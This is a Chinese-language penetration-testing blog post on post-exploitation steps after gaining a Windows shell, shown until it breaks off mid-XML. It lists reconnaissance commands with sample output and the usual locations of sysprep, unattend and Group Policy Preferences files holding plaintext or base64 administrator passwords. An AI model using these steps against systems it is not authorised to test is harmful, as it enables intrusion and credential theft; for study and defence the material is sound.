

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon/warning.png">
  <link rel="icon" href="/img/icon/warning.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="K0rz3n">
  <meta name="keywords" content="">
  
    <meta name="description" content="0X00 前言看到一篇文章讲到这个内容，就打算自己也整理一下顺便梳理一下思路 0X01 信息收集1.收集系统信息：系统信息至关重要，关乎我们后面怎么提权 中文系统：systeminfo|findstr &#x2F;B &#x2F;C:&quot;OS 名称&quot; &#x2F;C:&quot;OS 版本&quot; 英文系统: systeminfo|findstr &#x2F;B &#x2F;C:&quot;OS Name&quot; &#x2F;C:">
<meta property="og:type" content="article">
<meta property="og:title" content="拿到一个普通的 Windows Shell 以后能做什么">
<meta property="og:url" content="http://k0rz3n.com/2019/01/27/%E6%8B%BF%E5%88%B0%E4%B8%80%E4%B8%AA%E6%99%AE%E9%80%9A%E7%9A%84%20Windows%20Shell%20%E4%BB%A5%E5%90%8E%E8%83%BD%E5%81%9A%E4%BB%80%E4%B9%88/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0X00 前言看到一篇文章讲到这个内容，就打算自己也整理一下顺便梳理一下思路 0X01 信息收集1.收集系统信息：系统信息至关重要，关乎我们后面怎么提权 中文系统：systeminfo|findstr &#x2F;B &#x2F;C:&quot;OS 名称&quot; &#x2F;C:&quot;OS 版本&quot; 英文系统: systeminfo|findstr &#x2F;B &#x2F;C:&quot;OS Name&quot; &#x2F;C:">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP1.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP2.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP3.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP4.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP5.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP6.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP7.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP8.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP9.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP10.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP11.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP12.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP13.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP14.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP16.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP15.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP17.png">
<meta property="article:published_time" content="2019-01-27T15:17:18.000Z">
<meta property="article:modified_time" content="2025-01-24T15:19:21.090Z">
<meta property="article:author" content="K0rz3n">
<meta property="article:tag" content="渗透测试 技巧">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP1.png">
  
  
  
  <title>拿到一个普通的 Windows Shell 以后能做什么 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/macpanel.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"k0rz3n.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 60vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>K0rz3n&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/banner/icemountain.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="拿到一个普通的 Windows Shell 以后能做什么"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2019-01-27 15:17" pubdate>
          January 27, 2019 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.7k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          40 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">拿到一个普通的 Windows Shell 以后能做什么</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="0X00-前言"><a href="#0X00-前言" class="headerlink" title="0X00 前言"></a><strong>0X00 前言</strong></h2><p>看到一篇文章讲到这个内容，就打算自己也整理一下顺便梳理一下思路</p>
<h2 id="0X01-信息收集"><a href="#0X01-信息收集" class="headerlink" title="0X01 信息收集"></a><strong>0X01 信息收集</strong></h2><h3 id="1-收集系统信息："><a href="#1-收集系统信息：" class="headerlink" title="1.收集系统信息："></a><strong>1.收集系统信息：</strong></h3><p>系统信息至关重要，关乎我们后面怎么提权</p>
<pre><code class="hljs">中文系统：systeminfo|findstr /B /C:&quot;OS 名称&quot; /C:&quot;OS 版本&quot;
英文系统: systeminfo|findstr /B /C:&quot;OS Name&quot; /C:&quot;OS Version&quot;
</code></pre>
<p><strong>例如：</strong></p>
<pre><code class="hljs">C:\Users\Administrator&gt;systeminfo|findstr /B /C:&quot;OS 名称&quot; /C:&quot;OS 版本&quot;
OS 名称:          Microsoft Windows Server 2008 R2 Standard
OS 版本:          6.1.7600 暂缺 Build 7600
</code></pre>
<span id="more"></span>

<h3 id="2-主机名和Shell用户名"><a href="#2-主机名和Shell用户名" class="headerlink" title="2.主机名和Shell用户名"></a><strong>2.主机名和Shell用户名</strong></h3><pre><code class="hljs">C:\Users\Administrator&gt;hostname
WIN-ITRDTMACNHN

C:\Users\Administrator&gt;echo %username%
Administrator
</code></pre>
<h3 id="3-其他用户组和当前用户详细信息"><a href="#3-其他用户组和当前用户详细信息" class="headerlink" title="3.其他用户组和当前用户详细信息"></a><strong>3.其他用户组和当前用户详细信息</strong></h3><p>通过这个信息收集我们能判断我们的用户属于什么用户组</p>
<pre><code class="hljs">C:\Users\Administrator&gt;net users

\\WIN-ITRDTMACNHN 的用户帐户

--------------------------------------------------------------
Administrator            FTPuser                  Guest
命令成功完成。


C:\Users\Administrator&gt;net user Administrator
用户名                 Administrator
全名
注释                   管理计算机(域)的内置帐户
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2018/6/28 16:32:48
密码到期               2018/8/9 16:32:48
密码可更改             2018/6/28 16:32:48
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               2018/9/30 11:34:43

可允许的登录小时数     All

本地组成员             *Administrators
全局组成员             *None
命令成功完成。
</code></pre>
<h3 id="4-网络配置信息"><a href="#4-网络配置信息" class="headerlink" title="4.网络配置信息"></a><strong>4.网络配置信息</strong></h3><p>使用下面的三条命名就能比较好的看出主机    </p>
<pre><code class="hljs">ipconfig /all
route print 
arp -A
</code></pre>
<h3 id="5-检查主机的端口开放情况"><a href="#5-检查主机的端口开放情况" class="headerlink" title="5.检查主机的端口开放情况"></a><strong>5.检查主机的端口开放情况</strong></h3><pre><code class="hljs">netstat -ano
</code></pre>
<h3 id="6-检查主机的防火墙规则"><a href="#6-检查主机的防火墙规则" class="headerlink" title="6.检查主机的防火墙规则"></a><strong>6.检查主机的防火墙规则</strong></h3><pre><code class="hljs">C:\Users\Administrator&gt;netsh firewall show state

防火墙状态:
-------------------------------------------------------------------
配置文件                          = 标准
操作模式                          = 启用
例外模式                          = 启用
多播/广播响应模式                 = 启用
通知模式                          = 禁用
组策略版本                        = Windows 防火墙
远程管理模式                      = 禁用

所有网络接口上的端口当前均为打开状态:
端口   协议  版本  程序
-------------------------------------------------------------------
800    TCP       任何       (null)


C:\Users\Administrator&gt;netsh firewall show config

域 配置文件配置:
-------------------------------------------------------------------
操作模式                          = 启用
例外模式                          = 启用
多播/广播响应模式                 = 启用
通知模式                          = 禁用

域 配置文件的允许的程序配置:
模式     流量方向             名称/程序
-------------------------------------------------------------------
禁用       入站                   Windows 服务主进程 / C:\Windows\System32\svch
st.exe
禁用       入站                   Internet Explorer / C:\Program Files (x86)\In
ernet Explorer\iexplore.exe

域 配置文件的端口配置:
端口   协议    流量方向              名称
-------------------------------------------------------------------
800    TCP       启用      入站                    test

域 配置文件的 ICMP 配置:
模式     类型  描述
-------------------------------------------------------------------
启用       2     允许出站数据包太大

标准 配置文件配置(当前):
-------------------------------------------------------------------
操作模式                          = 启用
例外模式                          = 启用
多播/广播响应模式                 = 启用
通知模式                          = 禁用

标准 配置文件的允许的程序配置:
模式     流量方向             名称/程序
-------------------------------------------------------------------
启用       入站                   Windows 服务主进程 / C:\Windows\System32\svch
st.exe

标准 配置文件的端口配置:
端口   协议    流量方向              名称
-------------------------------------------------------------------
800    TCP       启用      入站                    test

标准 配置文件的 ICMP 配置:
模式     类型  描述
-------------------------------------------------------------------
启用       2     允许出站数据包太大

日志配置:
-------------------------------------------------------------------
文件位置        = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
文件大小上限    = 4096 KB
丢弃的数据包数  = 禁用
连接数          = 禁用
</code></pre>
<h3 id="7-计划任务"><a href="#7-计划任务" class="headerlink" title="7.计划任务"></a><strong>7.计划任务</strong></h3><pre><code class="hljs">C:\Users\K0rz3n&gt;schtasks /query /fo LIST /v

主机名:                             DESKTOP-S2L4C24
任务名:                             \CorelUpdateHelperTaskCore
下次运行时间:                       2019/1/23 0:32:42
模式:                               就绪
登录状态:                           交互方式/后台方式
上次运行时间:                       2019/1/22 0:32:42
上次结果:                           0
创建者:                             N/A
要运行的任务:                       c:\Program Files (x86)\Corel\CUH\v2\CUH.exe /t
起始于:                             N/A
注释:                               N/A
计划任务状态:                       已启用
空闲时间:                           已禁用
电源管理:                           在电池模式停止, 不用电池启动
作为用户运行:                       Users
删除没有计划的任务:                 已禁用
如果运行了 X 小时 X 分钟，停止任务: 72:00:00
计划:                               计划数据在此格式中不可用。
计划类型:                           每天
开始时间:                           0:32:42
开始日期:                           2018/10/7
结束日期:                           N/A
天:                                 每 1 天
月:                                 N/A
重复: 每:                           已禁用
重复: 截止: 时间:                   已禁用
重复: 截止: 持续时间:               已禁用
重复: 如果还在运行，停止:           已禁用
</code></pre>
<h3 id="8-正在运行的进程"><a href="#8-正在运行的进程" class="headerlink" title="8.正在运行的进程"></a><strong>8.正在运行的进程</strong></h3><pre><code class="hljs">C:\Users\Administrator&gt;tasklist /SVC

映像名称                       PID 服务
========================= ======== =======================================
System Idle Process              0 暂缺
System                           4 暂缺
smss.exe                       232 暂缺
csrss.exe                      332 暂缺
wininit.exe                    384 暂缺
csrss.exe                      392 暂缺
winlogon.exe                   448 暂缺
services.exe                   484 暂缺
lsass.exe                      500 SamSs
lsm.exe                        508 暂缺
svchost.exe                    608 DcomLaunch, PlugPlay, Power
vmacthlp.exe                   672 VMware Physical Disk Helper Service
svchost.exe                    716 RpcEptMapper, RpcSs
svchost.exe                    788 Dhcp, eventlog, lmhosts
svchost.exe                    844 gpsvc, IKEEXT, iphlpsvc, LanmanServer,
                                   ProfSvc, Schedule, seclogon, SENS,
                                   ShellHWDetection, Winmgmt, wuauserv
svchost.exe                    932 EventSystem, netprofm, nsi
svchost.exe                    996 Netman, TrkWks, UxSms
svchost.exe                    256 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                    688 BFE, DPS, MpsSvc
spoolsv.exe                   1092 Spooler
svchost.exe                   1124 AppHostSvc
svchost.exe                   1148 ftpsvc
svchost.exe                   1324 RemoteRegistry
...
</code></pre>
<h3 id="9-已经启动的服务"><a href="#9-已经启动的服务" class="headerlink" title="9.已经启动的服务"></a><strong>9.已经启动的服务</strong></h3><pre><code class="hljs">C:\Users\Administrator&gt;net start
已经启动以下 Windows 服务:

   Application Host Helper Service
   Base Filtering Engine
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Group Policy Client
   IKE and AuthIP IPsec Keying Modules
   IP Helper
   IPsec Policy Agent
   Microsoft FTP Service
   Network Connections
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler
   Remote Procedure Call (RPC)
   Remote Registry
   RPC Endpoint Mapper
   ...
</code></pre>
<h3 id="10-已经安装的驱动"><a href="#10-已经安装的驱动" class="headerlink" title="10.已经安装的驱动"></a><strong>10.已经安装的驱动</strong></h3><pre><code class="hljs">C:\Users\Administrator&gt;driverquery

模块名       显示名称               驱动程序类型  链接日期
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        2009/7/14 8:07:12
ACPI         Microsoft ACPI Driver  Kernel        2009/7/14 7:19:34
AcpiPmi      ACPI Power Meter Drive Kernel        2009/7/14 7:27:17
adp94xx      adp94xx                Kernel        2008/12/6 7:54:42
adpahci      adpahci                Kernel        2007/5/2 1:30:09
adpu320      adpu320                Kernel        2007/2/28 8:04:15
AFD          Ancillary Function Dri Kernel        2009/7/14 7:21:40
agp440       Intel AGP Bus Filter   Kernel        2009/7/14 7:38:43
aliide       aliide                 Kernel        2009/7/14 7:19:47
amdide       amdide                 Kernel        2009/7/14 7:19:49
AmdK8        AMD K8 Processor Drive Kernel        2009/7/14 7:19:25
AmdPPM       AMD Processor Driver   Kernel        2009/7/14 7:19:25
amdsata      amdsata                Kernel        2009/5/20 1:53:21
amdsbs       amdsbs                 Kernel        2009/3/21 2:36:03
amdxata      amdxata                Kernel        2009/5/20 1:56:59
...
</code></pre>
<h3 id="11-使用-wmic-收集重要信息"><a href="#11-使用-wmic-收集重要信息" class="headerlink" title="11.使用 wmic 收集重要信息"></a><strong>11.使用 wmic 收集重要信息</strong></h3><p>运行下面这个脚本来收集进程，服务，用户帐户，用户组，网络接口，硬盘驱动器信息，网络共享信息，已安装的 Windows 补丁程序，启动时运行的程序，已安装软件列表，操作系统和时区信息。</p>
<pre><code class="hljs">for /f &quot;delims=&quot; %%A in (&#39;dir /s /b %WINDIR%\system32\*htable.xsl&#39;) do set &quot;var=%%A&quot;

wmic process get CSName,Description,ExecutablePath,ProcessId /format:&quot;%var%&quot; &gt;&gt; out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:&quot;%var%&quot; &gt;&gt; out.html
wmic USERACCOUNT list full /format:&quot;%var%&quot; &gt;&gt; out.html
wmic group list full /format:&quot;%var%&quot; &gt;&gt; out.html
wmic nicconfig where IPEnabled=&#39;true&#39; get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:&quot;%var%&quot; &gt;&gt; out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:&quot;%var%&quot; &gt;&gt; out.html
wmic netuse list full /format:&quot;%var%&quot; &gt;&gt; out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:&quot;%var%&quot; &gt;&gt; out.html
wmic startup get Caption,Command,Location,User /format:&quot;%var%&quot; &gt;&gt; out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:&quot;%var%&quot; &gt;&gt; out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:&quot;%var%&quot; &gt;&gt; out.html
wmic Timezone get DaylightName,Description,StandardName /format:&quot;%var%&quot; &gt;&gt; out.html
</code></pre>
<p><strong>补充：</strong></p>
<p>使用下面的命令也可获取主机的已经安装的补丁信息</p>
<pre><code class="hljs">wmic qfe get Caption,Description,HotFixID,InstalledOn
</code></pre>
<h2 id="0X02-利用特权提升漏洞直接提权"><a href="#0X02-利用特权提升漏洞直接提权" class="headerlink" title="0X02 利用特权提升漏洞直接提权"></a><strong>0X02 利用特权提升漏洞直接提权</strong></h2><p>这一部分的内容我在我的 <strong>渗透测试小技巧一</strong> 中 写过了，这里就不在赘述</p>
<h2 id="0X03-在计算机中获取明文或者可解密的密码"><a href="#0X03-在计算机中获取明文或者可解密的密码" class="headerlink" title="0X03 在计算机中获取明文或者可解密的密码"></a><strong>0X03 在计算机中获取明文或者可解密的密码</strong></h2><p>现实的域环境中会有大量的服务器需要配置，作为一个管理员是不可能一台一台的配置的，他们通常会选择自动化安装或者克隆，这就可能会遗留下安装过程的配置文件，这些配置文件中会包含许多敏感信息，例如管理员账号密码。</p>
<h3 id="1-使用-Sysprep-exe-批量部署"><a href="#1-使用-Sysprep-exe-批量部署" class="headerlink" title="1.使用 Sysprep.exe 批量部署"></a><strong>1.使用 Sysprep.exe 批量部署</strong></h3><p>为同类计算环境中具有相似硬件配置的基于 Windows 的成千上万台计算机进行部署的企业客户希望能自定义一台计算机，然后将其硬盘（或”映像”）复制到公司的其他计算机上。同样，网络管理员希望在必要时能在时间关键的环境中快速替换计算机。</p>
<p>单位中的系统管理员通常会预装客户计算机，或物理访问每台客户机以安装操作系统，Sysprep 的设计旨在降低此类任务产生的费用。它使管理员（或第三方集成商）能将单个工作站配置复制到多台客户机，从而大大节约了管理时间和资源。管理员只需做出一组有关计算机设置的假设，从而减少了标准 Windows 安装的开销。</p>
<p><strong>Sysprep.inf</strong><br>作为建立并部署标准映像的一部分，您可能需要为单个目标计算机自定义少量设置及参数。例如，每个基于 Windows 2000 的计算机需要有唯一的计算机名。”最小安装向导”通常会提示用户保留信息。不过在许多情况下，如果您知道必要信息并且不希望提示用户输入这些信息，则可使用可选的应答文件 Sysprep.inf 实现自动输入。使用 Sysprep.inf 文件，您可让”最小安装向导”只提示某些信息，或创建完全自动的安装。</p>
<p><strong>最小安装向导</strong><br>计算机第一次从复制磁盘启动时，”最小安装向导”启动。它收集新复制的目标计算机所需的全部信息。如果不使用 Sysprep.inf，则”最小安装向导”显示以下项目：</p>
<pre><code class="hljs">欢迎
Microsoft 许可协议
产品 ID
区域设置
用户名和公司
计算机名和管理员密码
TAPI 设置（仅适于有调制解调器时）
网络配置
加入工作组或域（仅适于工作站）
服务器许可（仅适于服务器）
时区选择
完成/重新启动
</code></pre>
<p>也就是说，我们在 sysprep.inf 中指定的信息克隆计算机在安装时就会默认填好，并且不能被更改，那么如果管理员填入了密码的话我们就能通过这个文件获取</p>
<blockquote>
<p>当然除了使用 sysprep 这种方式以外，还有与之类似的无人安装的方式，这种方式使用的配置文件是 unattend.txt</p>
</blockquote>
<p><strong>通常这些敏感文件会出现在下面目录</strong></p>
<pre><code class="hljs">c:\sysprep.inf

c:\sysprep\sysprep.xml

%WINDIR%\Panther\Unattend\Unattended.xml

%WINDIR%\Panther\Unattended.xml
</code></pre>
<p>这些配置文件极可能包含明文密码，也可能会出现 base64 编码的情况，下面是一些配置文件的事例：</p>
<pre><code class="hljs"># This is a sample from sysprep.inf with clear-text credentials.

[GuiUnattended]
OEMSkipRegional=1
OemSkipWelcome=1
AdminPassword=s3cr3tp4ssw0rd
TimeZone=20

# This is a sample from sysprep.xml with Base64 &quot;encoded&quot; credentials. Please people Base64 is not
encryption, I take more precautions to protect my coffee. The password here is &quot;SuperSecurePassword&quot;.

&lt;LocalAccounts&gt;
    &lt;LocalAccount wcm:action=&quot;add&quot;&gt;
        &lt;Password&gt;
            &lt;Value&gt;U3VwZXJTZWN1cmVQYXNzd29yZA==&lt;/Value&gt;
            &lt;PlainText&gt;false&lt;/PlainText&gt;
        &lt;/Password&gt;
        &lt;Description&gt;Local Administrator&lt;/Description&gt;
        &lt;DisplayName&gt;Administrator&lt;/DisplayName&gt;
        &lt;Group&gt;Administrators&lt;/Group&gt;
        &lt;Name&gt;Administrator&lt;/Name&gt;
    &lt;/LocalAccount&gt;
&lt;/LocalAccounts&gt;

# Sample from Unattended.xml with the same &quot;secure&quot; Base64 encoding.

&lt;AutoLogon&gt;
    &lt;Password&gt;
        &lt;Value&gt;U3VwZXJTZWN1cmVQYXNzd29yZA==&lt;/Value&gt;
        &lt;PlainText&gt;false&lt;/PlainText&gt;
    &lt;/Password&gt;
    &lt;Enabled&gt;true&lt;/Enabled&gt;
    &lt;Username&gt;Administrator&lt;/Username&gt;
&lt;/AutoLogon&gt;
</code></pre>
<p>关于以上更详细的内容请参看  <a target="_blank" rel="noopener" href="https://www.xuebuyuan.com/2082105.html">这篇文章</a></p>
<h3 id="1-使用-GPP-Group-Policy-Preferences-部署"><a href="#1-使用-GPP-Group-Policy-Preferences-部署" class="headerlink" title="1.使用 GPP(Group Policy Preferences) 部署"></a><strong>1.使用 GPP(Group Policy Preferences) 部署</strong></h3><p>在域中，存在一个默认的共享路径：</p>
<pre><code class="hljs">\\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\
</code></pre>
<p>所有域内主机都能访问，里面保存组策略相关数据，包含登录脚本配置文件等</p>
<p>例如，测试主机所在域为test.local，可访问共享文件夹\test.local\SYSVOL\test.local，如下图</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP1.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>想要批量修改域内主机本地管理员密码，常常通过配置组策略执行vbs脚本的方式</p>
<p>给出一个修改密码的vbs脚本(实现方式不唯一)，代码如下：</p>
<pre><code class="hljs">strComputer = &quot;.&quot;
Set objUser = GetObject(&quot;WinNT://&quot; &amp; strComputer &amp; &quot;/Administrator, user&quot;)
objUser.SetPassword &quot;domain123!&quot;
objUser.SetInfo
</code></pre>
<p>这种实现方式，最大的弊端在于修改后的密码会明文保存在vbs脚本中,而该vbs脚本通常会保存在共享文件夹\SYSVOL</p>
<blockquote>
<p><strong>这就存在一个隐患:</strong></p>
<p>任何域用户都能读取该vbs脚本，也就能够获取脚本中保存的明文密码</p>
</blockquote>
<p>于是我们还可以通过 GPP（组策略偏好）来进行配置</p>
<p><strong>开始-管理工具-组策略管理<br>选择域test.local，右键，选中在这个域中创建GPO并在此处链接，如下图</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP2.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>设置名称为test6<br>test6-设置-右键-编辑-用户配置-首选项-控制面板设置-本地用户和组,如下图</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP3.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>更新，administrator(内置),设置密码，如下图</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP4.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>委派，设置权限<br>在详细一栏，可看到该策略对应的ID为{E6424F10-C44B-4C45-8527-740189CBF60E}</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP5.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>至此，组策略配置完成，域内主机重新登录，即可应用此策略，在共享文件夹\SYSVOL中可看到组策略对应ID的文件夹，如下图</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP6.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>由于我们刚刚修改了用户配置下的控制面板，所以在对应的文件夹下能找到配置文件Groups.xml，具体路径如下：</p>
<pre><code class="hljs">\\test.local\SYSVOL\test.local\Policies\&#123;E6424F10-C44B-4C45-8527-740189CBF60E&#125;\User\Preferences\Groups
</code></pre>
<p><strong>Groups.xml内容如下：</strong></p>
<pre><code class="hljs">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt; 
- &lt;Groups clsid=&quot;&#123;3125E937-EB16-4b4c-9934-544FC6D24D26&#125;&quot;&gt;
- &lt;User clsid=&quot;&#123;DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1&#125;&quot; name=&quot;Administrator (内置)&quot; image=&quot;2&quot; changed=&quot;2017-09-25 22:57:53&quot; uid=&quot;&#123;463245FF-08D3-4A28-95E7-42AB416DC508&#125;&quot;&gt;
